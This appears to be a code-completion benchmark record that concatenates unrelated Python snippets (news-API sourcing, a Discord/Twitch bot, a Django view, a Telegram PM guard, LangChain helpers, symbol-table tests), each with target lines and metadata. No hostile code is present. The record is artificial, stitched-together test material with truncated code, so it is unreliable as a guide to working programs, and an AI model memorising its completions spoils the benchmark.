def save_img_numpy(self, dir_name:str, file_name:str, img:np.array, ext='png'):
if np.shape(img)[2] == 1: | save_img(self.get_dir(dir_name), '%s.%s'%(file_name, ext), np.squeeze(img, 2)) | 1 | 2023-11-16 02:22:32+00:00 | 2k |
VCasecnikovs/RAGAgainstTheMachine | sourcing.py | [
{
"identifier": "chat_inference",
"path": "chatting.py",
"snippet": "def chat_inference(\n messages: list[ChatMessage],\n client: OpenAI,\n model=\"gpt-4-1106-preview\",\n):\n formatted_messages = []\n for message in messages:\n formatted_messages.append(\n {\n ... | import requests
import os
import json
from dotenv import load_dotenv
from newspaper import Article
from chatting import chat_inference, ChatMessage, get_openAI_client, Role | 1,090 | YOU_HEADERS = {"X-API-Key": os.environ.get("YOUCOM_API_KEY", "")}
def _get_you_search_impl(
query: str, page_index: int = 0, limit: int = 20, country: str = ""
):
url = "https://api.ydc-index.io/search"
query_args = {"query": query}
if page_index:
query_args["offset"] = page_index
if limit:
query_args["count"] = limit
if country:
query_args["country"] = country
response = requests.request("GET", url, headers=YOU_HEADERS, params=query_args)
results = []
for line in response.json()["hits"]:
snippets = " ".join(line["snippets"])
description = ". ".join([line["title"], snippets])
results.append(
{
"url": line["url"],
"title": line["title"],
"text": description,
}
)
return results
def _get_you_news_impl(
query: str, page_index: int = 0, limit: int = 20, country: str = ""
):
url = "https://api.ydc-index.io/news"
query_args = {"q": query}
if page_index:
query_args["offset"] = page_index
if limit:
query_args["count"] = limit
if country:
query_args["country"] = country
response = requests.request("GET", url, headers=YOU_HEADERS, params=query_args)
results = []
for line in response.json()["news"]["results"]:
results.append(
{"url": line["url"], "title": line["title"], "text": line["description"]}
)
return results
def get_you_search(query: str):
# TODO: pass the page here somehow
return _get_you_search_impl(query, page_index=0, country="")
def get_you_news(query: str):
# TODO: pass the page here somehow
results = []
for _ in range(1):
results.extend(_get_you_news_impl(query, page_index=0, country=""))
return results
def _get_newsapi_impl(
query: str, page_index: int = 0, limit: int = 20
):
url = "https://newsapi.org/v2/everything"
query_args = {
"q": query,
"apiKey": os.environ.get("NEWSAPI_API_KEY")
}
if page_index:
query_args["page"] = page_index+1
if limit:
query_args["pageSize"] = limit
response = requests.request("GET", url, params=query_args)
results = []
for line in response.json()["articles"]:
results.append(
{"url": line["url"], "title": line["title"], "text": line["description"] + " " + line["content"]}
)
return results
def get_newsapi_news(query: str):
results = []
for _ in range(1):
results.extend(_get_newsapi_impl(query, page_index=0))
return results
SOURCES = {
"you_news": get_you_news,
# "you_search": get_you_search,
# "news_api": get_newsapi_news,
}
def get_page_text(url: str) -> str:
try:
article = Article(url)
article.download()
article.parse()
return article.text
except Exception:
return ""
def scrape_data(articles_data: list[dict]):
for article in articles_data:
parsed_text = get_page_text(article["url"])
if parsed_text:
article["text"] = article["text"] + " ." + parsed_text
def filter_urls(urls):
|
load_dotenv()
YOU_HEADERS = {"X-API-Key": os.environ.get("YOUCOM_API_KEY", "")}
def _get_you_search_impl(
query: str, page_index: int = 0, limit: int = 20, country: str = ""
):
url = "https://api.ydc-index.io/search"
query_args = {"query": query}
if page_index:
query_args["offset"] = page_index
if limit:
query_args["count"] = limit
if country:
query_args["country"] = country
response = requests.request("GET", url, headers=YOU_HEADERS, params=query_args)
results = []
for line in response.json()["hits"]:
snippets = " ".join(line["snippets"])
description = ". ".join([line["title"], snippets])
results.append(
{
"url": line["url"],
"title": line["title"],
"text": description,
}
)
return results
def _get_you_news_impl(
query: str, page_index: int = 0, limit: int = 20, country: str = ""
):
url = "https://api.ydc-index.io/news"
query_args = {"q": query}
if page_index:
query_args["offset"] = page_index
if limit:
query_args["count"] = limit
if country:
query_args["country"] = country
response = requests.request("GET", url, headers=YOU_HEADERS, params=query_args)
results = []
for line in response.json()["news"]["results"]:
results.append(
{"url": line["url"], "title": line["title"], "text": line["description"]}
)
return results
def get_you_search(query: str):
# TODO: pass the page here somehow
return _get_you_search_impl(query, page_index=0, country="")
def get_you_news(query: str):
# TODO: pass the page here somehow
results = []
for _ in range(1):
results.extend(_get_you_news_impl(query, page_index=0, country=""))
return results
def _get_newsapi_impl(
query: str, page_index: int = 0, limit: int = 20
):
url = "https://newsapi.org/v2/everything"
query_args = {
"q": query,
"apiKey": os.environ.get("NEWSAPI_API_KEY")
}
if page_index:
query_args["page"] = page_index+1
if limit:
query_args["pageSize"] = limit
response = requests.request("GET", url, params=query_args)
results = []
for line in response.json()["articles"]:
results.append(
{"url": line["url"], "title": line["title"], "text": line["description"] + " " + line["content"]}
)
return results
def get_newsapi_news(query: str):
results = []
for _ in range(1):
results.extend(_get_newsapi_impl(query, page_index=0))
return results
SOURCES = {
"you_news": get_you_news,
# "you_search": get_you_search,
# "news_api": get_newsapi_news,
}
def get_page_text(url: str) -> str:
try:
article = Article(url)
article.download()
article.parse()
return article.text
except Exception:
return ""
def scrape_data(articles_data: list[dict]):
for article in articles_data:
parsed_text = get_page_text(article["url"])
if parsed_text:
article["text"] = article["text"] + " ." + parsed_text
def filter_urls(urls): | client = get_openAI_client() | 2 | 2023-11-18 22:12:07+00:00 | 2k |
TimeEnjoyed/TimeBot | core/bots.py | [
{
"identifier": "config",
"path": "core/config.py",
"snippet": ""
},
{
"identifier": "MBTI_TYPES",
"path": "core/constants.py",
"snippet": "MBTI_TYPES: list[str] = [\n \"ESTP\",\n \"ESTJ\",\n \"ESFP\",\n \"ESFJ\",\n \"ISTP\",\n \"ISTJ\",\n \"ISFP\",\n \"ISFJ\",\n ... | import asyncio
import json
import logging
import pathlib
import aiohttp
import discord
import twitchio
import wavelink
from typing import TYPE_CHECKING
from urllib.parse import quote
from discord.ext import commands
from twitchio.ext import commands as tcommands
from .config import config
from .constants import MBTI_TYPES
from collections.abc import Sequence
from typing import Any
from database import Database | 1,296 | if TYPE_CHECKING:
logger: logging.Logger = logging.getLogger(__name__)
LIVE_ROLE_ID: int = 1182206699969458226
SUBBED_ROLE_ID: int = 873044115279990836
class DiscordBot(commands.Bot):
tbot: TwitchBot
def __init__(self, *, database: Database) -> None:
self.database = database
intents: discord.Intents = discord.Intents.default()
intents.message_content = True
intents.members = True
intents.presences = True
self.loaded: bool = False
super().__init__(intents=intents, command_prefix=config["DISCORD"]["prefix"])
async def on_ready(self) -> None:
if self.loaded:
return
self.loaded = True
assert self.user
logger.info(f"Logged into Discord as {self.user} | {self.user.id}")
if config["DEBUG"]["enabled"] is True:
return
guild: discord.Guild = self.get_guild(859565527343955998) # type: ignore
role: discord.Role = guild.get_role(LIVE_ROLE_ID) # type: ignore
subbed: discord.Role = guild.get_role(SUBBED_ROLE_ID) # type: ignore
for member in guild.members:
if subbed not in member.roles:
continue
streaming = False
for activity in member.activities:
if isinstance(activity, discord.Streaming) and str(activity.platform).lower() == "twitch":
streaming = True
if streaming and role not in member.roles:
await member.add_roles(role)
await asyncio.sleep(1)
elif not streaming and role in member.roles:
await member.remove_roles(role)
await asyncio.sleep(1)
logger.info("Finished updating roles in on_ready event.")
async def setup_hook(self) -> None:
node: wavelink.Node = wavelink.Node(uri=config["WAVELINK"]["uri"], password=config["WAVELINK"]["password"])
await wavelink.Pool.connect(nodes=[node], client=self, cache_capacity=100)
location = ("extensions/discord", "extensions.discord")
extensions: list[str] = [f"{location[1]}.{f.stem}" for f in pathlib.Path(location[0]).glob("*.py")]
for extension in extensions:
await self.load_extension(extension)
logger.info("Loaded extensions for Discord Bot.")
async def on_wavelink_node_ready(self, payload: wavelink.NodeReadyEventPayload) -> None:
node: wavelink.Node = payload.node
logger.info("Wavelink successfully connected: %s. Resumed: %s", node.identifier, payload.resumed)
async def on_command_error(self, context: commands.Context, exception: commands.CommandError) -> None:
if isinstance(exception, commands.CommandNotFound):
return
logger.exception(exception)
async def on_presence_update(self, before: discord.Member, after: discord.Member) -> None:
if config["DEBUG"]["enabled"] is True:
return
if before.guild.id != 859565527343955998:
return
subbed: discord.Role | None = after.guild.get_role(SUBBED_ROLE_ID)
if subbed not in after.roles:
return
bstream: discord.Streaming | None = None
astream: discord.Streaming | None = None
for activity in before.activities:
if isinstance(activity, discord.Streaming) and str(activity.platform).lower() == "twitch":
bstream = activity
for activity in after.activities:
if isinstance(activity, discord.Streaming) and str(activity.platform).lower() == "twitch":
astream = activity
if bstream is not None and astream is not None:
return
role: discord.Role = before.guild.get_role(LIVE_ROLE_ID) # type: ignore
if not bstream and astream and role not in before.roles:
await before.add_roles(role, reason="Started streaming on Twitch")
elif not astream and bstream and role in after.roles:
await after.remove_roles(role, reason="Stopped streaming on Twitch")
def mbti_count(self) -> dict[str, int]:
guild: discord.Guild | None = self.get_guild(859565527343955998)
assert guild is not None
roles: Sequence[discord.Role] = guild.roles
| """Copyright 2023 TimeEnjoyed <https://github.com/TimeEnjoyed/>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import annotations
if TYPE_CHECKING:
logger: logging.Logger = logging.getLogger(__name__)
LIVE_ROLE_ID: int = 1182206699969458226
SUBBED_ROLE_ID: int = 873044115279990836
class DiscordBot(commands.Bot):
tbot: TwitchBot
def __init__(self, *, database: Database) -> None:
self.database = database
intents: discord.Intents = discord.Intents.default()
intents.message_content = True
intents.members = True
intents.presences = True
self.loaded: bool = False
super().__init__(intents=intents, command_prefix=config["DISCORD"]["prefix"])
async def on_ready(self) -> None:
if self.loaded:
return
self.loaded = True
assert self.user
logger.info(f"Logged into Discord as {self.user} | {self.user.id}")
if config["DEBUG"]["enabled"] is True:
return
guild: discord.Guild = self.get_guild(859565527343955998) # type: ignore
role: discord.Role = guild.get_role(LIVE_ROLE_ID) # type: ignore
subbed: discord.Role = guild.get_role(SUBBED_ROLE_ID) # type: ignore
for member in guild.members:
if subbed not in member.roles:
continue
streaming = False
for activity in member.activities:
if isinstance(activity, discord.Streaming) and str(activity.platform).lower() == "twitch":
streaming = True
if streaming and role not in member.roles:
await member.add_roles(role)
await asyncio.sleep(1)
elif not streaming and role in member.roles:
await member.remove_roles(role)
await asyncio.sleep(1)
logger.info("Finished updating roles in on_ready event.")
async def setup_hook(self) -> None:
node: wavelink.Node = wavelink.Node(uri=config["WAVELINK"]["uri"], password=config["WAVELINK"]["password"])
await wavelink.Pool.connect(nodes=[node], client=self, cache_capacity=100)
location = ("extensions/discord", "extensions.discord")
extensions: list[str] = [f"{location[1]}.{f.stem}" for f in pathlib.Path(location[0]).glob("*.py")]
for extension in extensions:
await self.load_extension(extension)
logger.info("Loaded extensions for Discord Bot.")
async def on_wavelink_node_ready(self, payload: wavelink.NodeReadyEventPayload) -> None:
node: wavelink.Node = payload.node
logger.info("Wavelink successfully connected: %s. Resumed: %s", node.identifier, payload.resumed)
async def on_command_error(self, context: commands.Context, exception: commands.CommandError) -> None:
if isinstance(exception, commands.CommandNotFound):
return
logger.exception(exception)
async def on_presence_update(self, before: discord.Member, after: discord.Member) -> None:
if config["DEBUG"]["enabled"] is True:
return
if before.guild.id != 859565527343955998:
return
subbed: discord.Role | None = after.guild.get_role(SUBBED_ROLE_ID)
if subbed not in after.roles:
return
bstream: discord.Streaming | None = None
astream: discord.Streaming | None = None
for activity in before.activities:
if isinstance(activity, discord.Streaming) and str(activity.platform).lower() == "twitch":
bstream = activity
for activity in after.activities:
if isinstance(activity, discord.Streaming) and str(activity.platform).lower() == "twitch":
astream = activity
if bstream is not None and astream is not None:
return
role: discord.Role = before.guild.get_role(LIVE_ROLE_ID) # type: ignore
if not bstream and astream and role not in before.roles:
await before.add_roles(role, reason="Started streaming on Twitch")
elif not astream and bstream and role in after.roles:
await after.remove_roles(role, reason="Stopped streaming on Twitch")
def mbti_count(self) -> dict[str, int]:
guild: discord.Guild | None = self.get_guild(859565527343955998)
assert guild is not None
roles: Sequence[discord.Role] = guild.roles | mbti_dict: dict[str, int] = dict.fromkeys(MBTI_TYPES, 0) | 1 | 2023-11-15 23:04:42+00:00 | 2k |
henriquesebastiao/poupy | project/apps/app/views/transfer.py | [
{
"identifier": "TransferForm",
"path": "project/apps/app/forms.py",
"snippet": "class TransferForm(forms.Form):\n \"\"\"Form used to transfer money between accounts.\"\"\"\n\n description = forms.CharField(\n label='Description',\n widget=forms.TextInput(\n attrs={'placeh... | from django.contrib import messages
from django.contrib.auth.mixins import LoginRequiredMixin
from django.shortcuts import redirect
from django.views.generic import FormView
from ..forms import TransferForm
from ..models import Account, Transfer | 643 | """Views for transfer app."""
class TransferView(LoginRequiredMixin, FormView):
"""Transfer view page."""
login_url = 'login'
template_name = 'pages/app/new_transfer.html'
| """Views for transfer app."""
class TransferView(LoginRequiredMixin, FormView):
"""Transfer view page."""
login_url = 'login'
template_name = 'pages/app/new_transfer.html' | form_class = TransferForm | 0 | 2023-11-17 21:05:05+00:00 | 2k |
AuroraNemoia/yuusei | main.py | [
{
"identifier": "log",
"path": "utils.py",
"snippet": "def log(text, type=\"normal\"):\n types = {\n \"quiet\": \"\\x1b[33;90m\",\n \"warn\": \"\\x1b[33;20m⚠️ WARN: \",\n \"error\": \"\\x1b[31;1m❌ ERROR: \",\n \"normal\": \"\\x1b[33;0m\"\n }\n print(types.get(type, t... | import requests
import json
import jstyleson
import os
import time
import random
import generate
import history
from utils import log, basepath, tokenize | 701 |
# Constants
config = jstyleson.loads(open(basepath() + "/config.json", "r").read())
# Initialize self
self_name = config["personality"]["name"]
self_persona = config["personality"]["persona"]
self_instruct_pre = config["personality"]["pre"]
self_instruct_post = config["personality"]["post"]
use_chat_completions = config["settings"]["use_chat_completions"]
force_pre = config["settings"]["force_pre"]
# Have self reply to the current situation.
def answer():
# What is the current situation?
prompt = buildPrompt()
def buildPrompt():
# Build the prompt frontmatter.
if use_chat_completions == True or force_pre == True:
frontmatter = self_instruct_pre + self_persona + self_instruct_post
else: # When using TextCompletions, we do not need to instruct the model, the response prompt does it for us.
frontmatter = self_persona + self_instruct_post
frontmatter_length = tokenize(frontmatter)
# What is our budget for message history?
history_token_budget = config["settings"]["context_size"] - config["settings"]["max_new_tokens"] - frontmatter_length
# Let's query messages until we hit the token limit.
message_event_stack = []
# TODO: implement checking max_history_items
event_stack = history.fetchEvents(6)
token_length = 0
for event in event_stack:
if event["event_type"] == "message":
token_length += tokenize(event["content"])
if token_length > history_token_budget:
break
message_event_stack.append(event)
# Build the message stack as a string.
message_stack = ""
for message in message_event_stack:
message_stack += (message["name"] + ": " + message["content"] + "\n")
# Build response prompt (unused in ChatCompletions).
response_prompt = self_name + ": "
prompt = frontmatter + message_stack
if use_chat_completions == False:
prompt += response_prompt
|
# Constants
config = jstyleson.loads(open(basepath() + "/config.json", "r").read())
# Initialize self
self_name = config["personality"]["name"]
self_persona = config["personality"]["persona"]
self_instruct_pre = config["personality"]["pre"]
self_instruct_post = config["personality"]["post"]
use_chat_completions = config["settings"]["use_chat_completions"]
force_pre = config["settings"]["force_pre"]
# Have self reply to the current situation.
def answer():
# What is the current situation?
prompt = buildPrompt()
def buildPrompt():
# Build the prompt frontmatter.
if use_chat_completions == True or force_pre == True:
frontmatter = self_instruct_pre + self_persona + self_instruct_post
else: # When using TextCompletions, we do not need to instruct the model, the response prompt does it for us.
frontmatter = self_persona + self_instruct_post
frontmatter_length = tokenize(frontmatter)
# What is our budget for message history?
history_token_budget = config["settings"]["context_size"] - config["settings"]["max_new_tokens"] - frontmatter_length
# Let's query messages until we hit the token limit.
message_event_stack = []
# TODO: implement checking max_history_items
event_stack = history.fetchEvents(6)
token_length = 0
for event in event_stack:
if event["event_type"] == "message":
token_length += tokenize(event["content"])
if token_length > history_token_budget:
break
message_event_stack.append(event)
# Build the message stack as a string.
message_stack = ""
for message in message_event_stack:
message_stack += (message["name"] + ": " + message["content"] + "\n")
# Build response prompt (unused in ChatCompletions).
response_prompt = self_name + ": "
prompt = frontmatter + message_stack
if use_chat_completions == False:
prompt += response_prompt
| log(prompt) | 0 | 2023-11-14 05:04:40+00:00 | 2k |
gunyu1019/async-client-decorator | example/single_session.py | [
{
"identifier": "request",
"path": "async_client_decorator/request.py",
"snippet": "def request(\n method: str,\n path: str,\n directly_response: bool = False,\n header_parameter: list[str] = None,\n query_parameter: list[str] = None,\n form_parameter: list[str] = None,\n path_param... | import asyncio
import aiohttp
from typing import NamedTuple
from async_client_decorator import request, Session, Query | 1,277 |
loop = asyncio.get_event_loop()
class StationInfo(NamedTuple):
displayId: str
id: str
name: str
posX: float
posY: float
stationId: str
type: int
|
loop = asyncio.get_event_loop()
class StationInfo(NamedTuple):
displayId: str
id: str
name: str
posX: float
posY: float
stationId: str
type: int
| @Session.single_session("https://api.yhs.kr") | 2 | 2023-11-14 06:41:19+00:00 | 2k |
pmutua/CodeCraftGPT | components/lang_page.py | [
{
"identifier": "PROGRAMMING_LANGUAGES",
"path": "data/programming_languages.py",
"snippet": "PROGRAMMING_LANGUAGES = (\n \"Python\", \"JavaScript\", \"Java\", \"C++\", \"C#\", \"Ruby\", \"Swift\", \"Go\", \"PHP\", \"Rust\", \"VB.net\",\n \"Kotlin\", \"TypeScript\", \"Scala\", \"Haskell\", \"Perl\... | from typing import Type
from langchain.chains import LLMChain
from langchain.chat_models import ChatOpenAI
from data.programming_languages import PROGRAMMING_LANGUAGES
from prompts.translate_code_prompt import create_translation_prompt
import streamlit as st | 674 | """
LangLink - Code Translation and Cross-Language Compatibility
Overcome language barriers with LangLink, an AI-powered tool facilitating smooth code translation
between programming languages. Developers can confidently migrate codebases, ensuring compatibility
and seamless transitions across different languages.
"""
def show_lang_page(chat: Type[ChatOpenAI]):
"""
Displays the LangLink page for code translation.
Parameters:
- openai_api_key (str): The API key for OpenAI.
Returns:
None
"""
st.title("LangLink - Code Translation and Cross-Language Compatibility")
st.markdown('Overcome language barriers with LangLink, an AI-powered tool facilitating smooth '
'code translation between programming languages. Developers can confidently migrate '
'codebases, ensuring compatibility and seamless transitions across different languages.')
with st.form(key="lang_form"):
source_code = st.text_area("Enter source code")
target_language = st.selectbox("Select programming language", PROGRAMMING_LANGUAGES)
submit_button = st.form_submit_button(label='Submit')
if submit_button:
st.text(f"Translating code snippet to {target_language}................✨")
| """
LangLink - Code Translation and Cross-Language Compatibility
Overcome language barriers with LangLink, an AI-powered tool facilitating smooth code translation
between programming languages. Developers can confidently migrate codebases, ensuring compatibility
and seamless transitions across different languages.
"""
def show_lang_page(chat: Type[ChatOpenAI]):
"""
Displays the LangLink page for code translation.
Parameters:
- openai_api_key (str): The API key for OpenAI.
Returns:
None
"""
st.title("LangLink - Code Translation and Cross-Language Compatibility")
st.markdown('Overcome language barriers with LangLink, an AI-powered tool facilitating smooth '
'code translation between programming languages. Developers can confidently migrate '
'codebases, ensuring compatibility and seamless transitions across different languages.')
with st.form(key="lang_form"):
source_code = st.text_area("Enter source code")
target_language = st.selectbox("Select programming language", PROGRAMMING_LANGUAGES)
submit_button = st.form_submit_button(label='Submit')
if submit_button:
st.text(f"Translating code snippet to {target_language}................✨")
| chat_prompt = create_translation_prompt(target_language,source_code) | 1 | 2023-11-13 10:45:28+00:00 | 2k |
itzshukla/STRANGER-USERBOT2.0 | Zaid/modules/private/pmguard.py | [
{
"identifier": "get_approved_users",
"path": "Zaid/database/pmpermitdb.py",
"snippet": "async def get_approved_users():\n results = await collection.find_one({\"_id\": \"Approved\"})\n if results:\n return results[\"users\"]\n else:\n return []"
},
{
"identifier": "pm_gua... | from pyrogram import filters, Client
from pyrogram.types import Message
from pyrogram.methods import messages
from Zaid.database.pmpermitdb import get_approved_users, pm_guard
from config import LOG_GROUP, PM_LOGGER
import asyncio
import Zaid.database.pmpermitdb as Zaid | 894 |
FLOOD_CTRL = 0
ALLOWED = []
USERS_AND_WARNS = {}
async def denied_users(filter, client: Client, message: Message):
if not await pm_guard():
return False
if message.chat.id in (await get_approved_users()):
return False
else:
return True
def get_arg(message):
msg = message.text
msg = msg.replace(" ", "", 1) if msg[1] == " " else msg
split = msg[1:].replace("\n", " \n").split(" ")
if " ".join(split[1:]).strip() == "":
return ""
return " ".join(split[1:])
@Client.on_message(filters.command("setlimit", ["."]) & filters.me)
async def pmguard(client, message):
arg = get_arg(message)
if not arg:
await message.edit("**Set limit to what?**")
return
await Zaid.set_limit(int(arg))
await message.edit(f"**Limit set to {arg}**")
@Client.on_message(filters.command("setblockmsg", ["."]) & filters.me)
async def setpmmsg(client, message):
arg = get_arg(message)
if not arg:
await message.edit("**What message to set**")
return
if arg == "default":
await Zaid.set_block_message(Zaid.BLOCKED)
await message.edit("**Block message set to default**.")
return
await Zaid.set_block_message(f"`{arg}`")
await message.edit("**Custom block message set**")
@Client.on_message(filters.command(["allow", "ap", "approve", "a"], ["."]) & filters.me & filters.private)
async def allow(client, message):
chat_id = message.chat.id
pmpermit, pm_message, limit, block_message = await Zaid.get_pm_settings()
await Zaid.allow_user(chat_id)
await message.edit(f"**I have allowed [you](tg://user?id={chat_id}) to PM me.**")
async for message in client.search_messages(
chat_id=message.chat.id, query=pm_message, limit=1, from_user="me"
):
await message.delete()
USERS_AND_WARNS.update({chat_id: 0})
@Client.on_message(filters.command(["deny", "dap", "disapprove", "dapp"], ["."]) & filters.me & filters.private)
async def deny(client, message):
chat_id = message.chat.id
await Zaid.deny_user(chat_id)
await message.edit(f"**I have denied [you](tg://user?id={chat_id}) to PM me.**")
@Client.on_message(
filters.private
& filters.create(denied_users)
& filters.incoming
& ~filters.service
& ~filters.me
& ~filters.bot
)
async def reply_pm(app: Client, message):
global FLOOD_CTRL
pmpermit, pm_message, limit, block_message = await Zaid.get_pm_settings()
user = message.from_user.id
user_warns = 0 if user not in USERS_AND_WARNS else USERS_AND_WARNS[user]
|
FLOOD_CTRL = 0
ALLOWED = []
USERS_AND_WARNS = {}
async def denied_users(filter, client: Client, message: Message):
if not await pm_guard():
return False
if message.chat.id in (await get_approved_users()):
return False
else:
return True
def get_arg(message):
msg = message.text
msg = msg.replace(" ", "", 1) if msg[1] == " " else msg
split = msg[1:].replace("\n", " \n").split(" ")
if " ".join(split[1:]).strip() == "":
return ""
return " ".join(split[1:])
@Client.on_message(filters.command("setlimit", ["."]) & filters.me)
async def pmguard(client, message):
arg = get_arg(message)
if not arg:
await message.edit("**Set limit to what?**")
return
await Zaid.set_limit(int(arg))
await message.edit(f"**Limit set to {arg}**")
@Client.on_message(filters.command("setblockmsg", ["."]) & filters.me)
async def setpmmsg(client, message):
arg = get_arg(message)
if not arg:
await message.edit("**What message to set**")
return
if arg == "default":
await Zaid.set_block_message(Zaid.BLOCKED)
await message.edit("**Block message set to default**.")
return
await Zaid.set_block_message(f"`{arg}`")
await message.edit("**Custom block message set**")
@Client.on_message(filters.command(["allow", "ap", "approve", "a"], ["."]) & filters.me & filters.private)
async def allow(client, message):
chat_id = message.chat.id
pmpermit, pm_message, limit, block_message = await Zaid.get_pm_settings()
await Zaid.allow_user(chat_id)
await message.edit(f"**I have allowed [you](tg://user?id={chat_id}) to PM me.**")
async for message in client.search_messages(
chat_id=message.chat.id, query=pm_message, limit=1, from_user="me"
):
await message.delete()
USERS_AND_WARNS.update({chat_id: 0})
@Client.on_message(filters.command(["deny", "dap", "disapprove", "dapp"], ["."]) & filters.me & filters.private)
async def deny(client, message):
chat_id = message.chat.id
await Zaid.deny_user(chat_id)
await message.edit(f"**I have denied [you](tg://user?id={chat_id}) to PM me.**")
@Client.on_message(
filters.private
& filters.create(denied_users)
& filters.incoming
& ~filters.service
& ~filters.me
& ~filters.bot
)
async def reply_pm(app: Client, message):
global FLOOD_CTRL
pmpermit, pm_message, limit, block_message = await Zaid.get_pm_settings()
user = message.from_user.id
user_warns = 0 if user not in USERS_AND_WARNS else USERS_AND_WARNS[user] | if PM_LOGGER: | 3 | 2023-11-13 18:19:50+00:00 | 2k |
UWNetworksLab/adn-compiler | compiler/element/optimize/consolidate.py | [
{
"identifier": "ELEMENT_LOG",
"path": "compiler/element/logger.py",
"snippet": "ELEMENT_LOG = logging.getLogger(\"ir\")"
},
{
"identifier": "Expr",
"path": "compiler/element/node.py",
"snippet": "class Expr(Node):\n def __init__(self, lhs: Expr, op: Operator, rhs: Expr):\n sel... | from copy import deepcopy
from typing import Callable, Dict, List, Optional, Protocol, Sequence, Tuple, TypeVar
from compiler.element.logger import ELEMENT_LOG as LOG
from compiler.element.node import *
from compiler.element.node import Expr, Identifier, Internal, MethodCall, Procedure
from compiler.element.visitor import Visitor | 952 |
def consolidate(irs: List[Program]) -> Program:
while len(irs) > 1:
left = irs.pop(0)
right = irs.pop(0)
new_prog = Program(
Internal([]),
Procedure("init", [], []),
Procedure("req", [], []),
Procedure("resp", [], []),
)
new_prog.definition.internal = deepcopy(
left.definition.internal + right.definition.internal
)
InitConsolidator().visitProcedure(new_prog.init, (left.init, right.init))
ProcedureConsolidator().visitProcedure(
new_prog.req, (deepcopy(left.req), deepcopy(right.req))
)
ProcedureConsolidator().visitProcedure(
new_prog.resp, (deepcopy(right.resp), deepcopy(left.resp))
)
irs.append(new_prog)
return irs[0]
class InitConsolidator(Visitor):
def __init__(self):
pass
def visitNode(self, node: Node, ctx) -> str:
|
def consolidate(irs: List[Program]) -> Program:
while len(irs) > 1:
left = irs.pop(0)
right = irs.pop(0)
new_prog = Program(
Internal([]),
Procedure("init", [], []),
Procedure("req", [], []),
Procedure("resp", [], []),
)
new_prog.definition.internal = deepcopy(
left.definition.internal + right.definition.internal
)
InitConsolidator().visitProcedure(new_prog.init, (left.init, right.init))
ProcedureConsolidator().visitProcedure(
new_prog.req, (deepcopy(left.req), deepcopy(right.req))
)
ProcedureConsolidator().visitProcedure(
new_prog.resp, (deepcopy(right.resp), deepcopy(left.resp))
)
irs.append(new_prog)
return irs[0]
class InitConsolidator(Visitor):
def __init__(self):
pass
def visitNode(self, node: Node, ctx) -> str: | LOG.error("InitConsolidator: visitNode not implemented") | 1 | 2023-11-13 07:31:52+00:00 | 2k |
sunholo-data/sunholo-py | sunholo/components/llm.py | [
{
"identifier": "setup_logging",
"path": "sunholo/logging.py",
"snippet": "def setup_logging(self, log_level=logging.INFO, logger_name=None):\n if log_level:\n self.log_level = log_level\n if logger_name:\n self.logger_name = logger_name\n\n try:\n caller_info = self._get_c... | from ..logging import setup_logging
from ..utils.config import load_config_key, load_config, get_module_filepath
from langchain.chat_models import ChatOpenAI
from langchain.llms import VertexAI
from langchain.llms import VertexAI
from ..patches.langchain.vertexai import VertexAIModelGarden
from langchain.chat_models import ChatOpenAI
from langchain.chat_models import ChatVertexAI
from langchain.chat_models import ChatVertexAI
from langchain_google_genai import ChatGoogleGenerativeAI
from langchain.embeddings import OpenAIEmbeddings
from langchain.embeddings import VertexAIEmbeddings
from langchain_google_genai import GoogleGenerativeAIEmbeddings | 1,108 | # Copyright [2023] [Holosun ApS]
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
logging = setup_logging()
def pick_llm(vector_name):
logging.debug('Picking llm')
| # Copyright [2023] [Holosun ApS]
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
logging = setup_logging()
def pick_llm(vector_name):
logging.debug('Picking llm')
| llm_str = load_config_key("llm", vector_name, filename = "config/llm_config.yaml") | 1 | 2023-11-14 14:53:19+00:00 | 2k |
atlantic-quantum/Shipyard | tests/passes/semantic_analysis/test_scoped_symbol_table.py | [
{
"identifier": "scoped_symbol_table",
"path": "shipyard/passes/semantic_analysis/scoped_symbol_table.py",
"snippet": "class ScopedSymbolTable:\nclass CalScopedSymbolTable(ScopedSymbolTable):\n def __init__(\n self,\n scope_name: str,\n enclosing_scope: \"ScopedSymbolTable\" = No... | import pytest
from shipyard.passes.semantic_analysis import scoped_symbol_table as sst
from shipyard.passes.semantic_analysis import symbols | 1,413 | """
The scoped symbol table is intended to be used by the Semantic Analyser module.
An 'end-to-end' use case example will be included in the tests for the Semantic Analyser
ToDo update working when adding semantic analyser tests
"""
SYMBOL_LISTS = [sst.BUILTIN_TYPES, sst.BUILTIN_ZI_EXP]
CAL_SYMBOL_LISTS = [sst.BUILTIN_CAL_TYPES, sst.BUILTIN_OPENPULSE, sst.BUILTIN_ZI_WFM]
@pytest.fixture(name="main_table")
def fixture_main_table() -> sst.ScopedSymbolTable:
"""Fixture for creating the 'main' ScopedSymbolTable
this table has no enclosing scope
Returns:
sst.ScopedSymbolTable: symbol table with no enclosing scope
"""
return sst.ScopedSymbolTable("main")
@pytest.fixture(name="nested_table")
def fixture_nested_table(main_table: sst.ScopedSymbolTable) -> sst.ScopedSymbolTable:
"""Fixture for creating a nested ScopedSymbolTable
the 'main' symbol table encloses this table
Args:
main_table (sst.ScopedSymbolTable): used as enclosing scope for this table
Returns:
sst.ScopedSymbolTable: symbol table with enclosing scope
"""
return sst.ScopedSymbolTable("nested", enclosing_scope=main_table)
@pytest.fixture(name="cal_table")
def fixture_cal_table(main_table: sst.ScopedSymbolTable) -> sst.CalScopedSymbolTable:
"""
Fixture for creating 'main' a ScopedSymbolTable for openPulse code,
